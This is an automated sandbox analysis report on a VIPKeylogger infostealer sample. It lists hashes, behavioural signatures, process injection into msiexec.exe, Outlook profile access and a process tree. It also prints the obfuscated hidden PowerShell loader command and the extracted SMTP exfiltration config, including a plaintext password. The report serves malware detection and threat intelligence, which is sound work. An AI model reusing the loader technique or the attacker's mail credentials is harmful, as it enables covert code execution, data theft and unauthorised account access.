Analysis
max time kernel: 149s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-10-2024 01:35
Static task: static1
Behavioral task: behavioral1
  Sample: 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
  Resource: win10v2004-20241007-en
Behavioral task: behavioral3
  Sample: Kontokurantens.ps1
  Resource: win7-20240903-en
Behavioral task: behavioral4
  Sample: Kontokurantens.ps1
  Resource: win10v2004-20241007-en
General
Target: 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
Size: 867KB
MD5: 25da279ad7ee7cc3b8d3e5cd5aa4b5b2
SHA1: d1fc6cbe8d8cca235ed29de6b109a0cb951eb5f3
SHA256: 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0
SHA512: db074cfe6c006f194b8b4ca983fb83a88229beb229504c8eba07140fe490974e90dfe75b66b9c4d81bd319fdaaccc822473064771b7ac8d333012859f139498e
SSDEEP: 12288:l9Zwb4/I1H06OdtVQuqilUSDFOIBETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0W:/dPFtVtOIB+alCJmvulW6Nd0vu
Malware Config
Extracted: vipkeylogger
Protocol: smtp
Host: smtp.ionos.fr
Port: 587
Username: [email protected]
Password: Jc.2o3o@
Email To: [email protected]
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Runs PowerShell with the display window hidden.
Processes (pid | process):
3456 | powershell.exe
3676 | powershell.exe
Accesses Microsoft Outlook profiles (1 TTPs, 6 IoCs)
Processes (description | ioc | process):
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Blocklisted process makes network request (16 IoCs)
Processes (flow | pid | process):
35 | 628 | msiexec.exe
36 | 2472 | msiexec.exe
38 | 628 | msiexec.exe
39 | 2472 | msiexec.exe
42 | 628 | msiexec.exe
43 | 2472 | msiexec.exe
47 | 2472 | msiexec.exe
48 | 628 | msiexec.exe
52 | 628 | msiexec.exe
53 | 2472 | msiexec.exe
58 | 628 | msiexec.exe
60 | 628 | msiexec.exe
62 | 2472 | msiexec.exe
64 | 2472 | msiexec.exe
66 | 628 | msiexec.exe
68 | 2472 | msiexec.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow | ioc):
57 | checkip.dyndns.org
Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes (pid | process):
628 | msiexec.exe
2472 | msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
Processes (pid | process):
3676 | powershell.exe
3456 | powershell.exe
628 | msiexec.exe
2472 | msiexec.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes (description | ioc | process):
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
Suspicious behavior: EnumeratesProcesses (20 IoCs)
Processes (pid | process):
3676 | powershell.exe
3676 | powershell.exe
3456 | powershell.exe
3456 | powershell.exe
3676 | powershell.exe
3676 | powershell.exe
3676 | powershell.exe
3676 | powershell.exe
3676 | powershell.exe
3676 | powershell.exe
3456 | powershell.exe
3456 | powershell.exe
3456 | powershell.exe
3456 | powershell.exe
3676 | powershell.exe
3456 | powershell.exe
628 | msiexec.exe
2472 | msiexec.exe
628 | msiexec.exe
2472 | msiexec.exe
Suspicious behavior: MapViewOfSection (2 IoCs)
Processes (pid | process):
3676 | powershell.exe
3456 | powershell.exe
Suspicious use of AdjustPrivilegeToken (46 IoCs)
Processes (description | pid | process):
Token: SeDebugPrivilege | 3676 | powershell.exe
Token: SeDebugPrivilege | 3456 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3676 | powershell.exe
Token: SeSecurityPrivilege | 3676 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3676 | powershell.exe
Token: SeLoadDriverPrivilege | 3676 | powershell.exe
Token: SeSystemProfilePrivilege | 3676 | powershell.exe
Token: SeSystemtimePrivilege | 3676 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3676 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3676 | powershell.exe
Token: SeCreatePagefilePrivilege | 3676 | powershell.exe
Token: SeBackupPrivilege | 3676 | powershell.exe
Token: SeRestorePrivilege | 3676 | powershell.exe
Token: SeShutdownPrivilege | 3676 | powershell.exe
Token: SeDebugPrivilege | 3676 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3676 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3676 | powershell.exe
Token: SeUndockPrivilege | 3676 | powershell.exe
Token: SeManageVolumePrivilege | 3676 | powershell.exe
Token: 33 | 3676 | powershell.exe
Token: 34 | 3676 | powershell.exe
Token: 35 | 3676 | powershell.exe
Token: 36 | 3676 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3456 | powershell.exe
Token: SeSecurityPrivilege | 3456 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3456 | powershell.exe
Token: SeLoadDriverPrivilege | 3456 | powershell.exe
Token: SeSystemProfilePrivilege | 3456 | powershell.exe
Token: SeSystemtimePrivilege | 3456 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3456 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3456 | powershell.exe
Token: SeCreatePagefilePrivilege | 3456 | powershell.exe
Token: SeBackupPrivilege | 3456 | powershell.exe
Token: SeRestorePrivilege | 3456 | powershell.exe
Token: SeShutdownPrivilege | 3456 | powershell.exe
Token: SeDebugPrivilege | 3456 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3456 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3456 | powershell.exe
Token: SeUndockPrivilege | 3456 | powershell.exe
Token: SeManageVolumePrivilege | 3456 | powershell.exe
Token: 33 | 3456 | powershell.exe
Token: 34 | 3456 | powershell.exe
Token: 35 | 3456 | powershell.exe
Token: 36 | 3456 | powershell.exe
Token: SeDebugPrivilege | 628 | msiexec.exe
Token: SeDebugPrivilege | 2472 | msiexec.exe
Suspicious use of WriteProcessMemory (14 IoCs)
Processes (description | pid | process | target process):
PID 4976 wrote to memory of 3676 | 4976 | 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe | powershell.exe
PID 4976 wrote to memory of 3676 | 4976 | 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe | powershell.exe
PID 4976 wrote to memory of 3676 | 4976 | 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe | powershell.exe
PID 4976 wrote to memory of 3456 | 4976 | 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe | powershell.exe
PID 4976 wrote to memory of 3456 | 4976 | 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe | powershell.exe
PID 4976 wrote to memory of 3456 | 4976 | 963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe | powershell.exe
PID 3676 wrote to memory of 628 | 3676 | powershell.exe | msiexec.exe
PID 3676 wrote to memory of 628 | 3676 | powershell.exe | msiexec.exe
PID 3676 wrote to memory of 628 | 3676 | powershell.exe | msiexec.exe
PID 3676 wrote to memory of 628 | 3676 | powershell.exe | msiexec.exe
PID 3456 wrote to memory of 2472 | 3456 | powershell.exe | msiexec.exe
PID 3456 wrote to memory of 2472 | 3456 | powershell.exe | msiexec.exe
PID 3456 wrote to memory of 2472 | 3456 | powershell.exe | msiexec.exe
PID 3456 wrote to memory of 2472 | 3456 | powershell.exe | msiexec.exe
outlook_office_path (1 IoCs)
Processes (description | ioc | process):
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
outlook_win_path (1 IoCs)
Processes (description | ioc | process):
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Processes
C:\Users\Admin\AppData\Local\Temp\963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 4976
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3676
    C:\Windows\SysWOW64\msiexec.exe
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 628
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3456
    C:\Windows\SysWOW64\msiexec.exe
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
      PID: 2472
Network
MITRE ATT&CK Enterprise v15
Downloads